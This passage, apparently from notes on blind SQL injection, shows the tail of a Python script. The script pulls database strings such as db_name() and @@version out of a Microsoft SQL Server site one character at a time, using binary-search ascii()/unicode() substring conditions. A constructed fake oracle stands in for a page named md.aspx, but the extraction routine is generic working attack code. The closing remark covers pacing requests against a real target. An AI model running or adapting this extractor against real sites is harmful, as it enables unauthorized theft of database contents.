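    top = 0xFFFF if func == "unicode" else 127
    chars = []
    for pos in range(1, find_length(oracle, expr) + 1):
        code = _search(lambda op, v: oracle(char_condition(expr, pos, op, v, func)), top)
        chars.append(chr(code))
    return "".join(chars)


# ---- constructed oracle standing in for md.aspx (not a real target) ----
FAKE_VALUES = {
    "@@version": "Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)",
    "db_name()": "文法學院",
}
CHAR_RE = re.compile(r"(ascii|unicode)\(substring\((.+),(\d+),1\)\)([<>=])(\d+)")
LEN_RE = re.compile(r"len\((.+)\)([<>=])(\d+)")
OPS = {">": lambda a, b: a > b, "<": lambda a, b: a < b, "=": lambda a, b: a == b}


def fake_oracle(c_param):
    """True when the 'normal' page would come back, i.e. the condition holds.
    Real ascii() on a non-ASCII nchar depends on the collation, which is why
    the notes switch to unicode(); this stand-in just returns the code point."""
    cond = c_param.replace("/**/", " ")
    m = CHAR_RE.search(cond)
    if m:
        func, expr, pos, op, num = m.groups()
        value = FAKE_VALUES[expr.strip()]
        if int(pos) > len(value):
            return False      # substring past the end gives '', and unicode('') is NULL
        return OPS[op](ord(value[int(pos) - 1]), int(num))
    m = LEN_RE.search(cond)
    if m:
        expr, op, num = m.groups()
        return OPS[op](len(FAKE_VALUES[expr.strip()]), int(num))
    return False


if __name__ == "__main__":
    print(extract(fake_oracle, "db_name()"))
    print(extract(fake_oracle, "@@version", func="ascii"))
```

The binary search only ever asks `>` questions, so each character costs a fixed number of requests regardless of its value, which keeps the traffic pattern predictable when pacing requests against a real target.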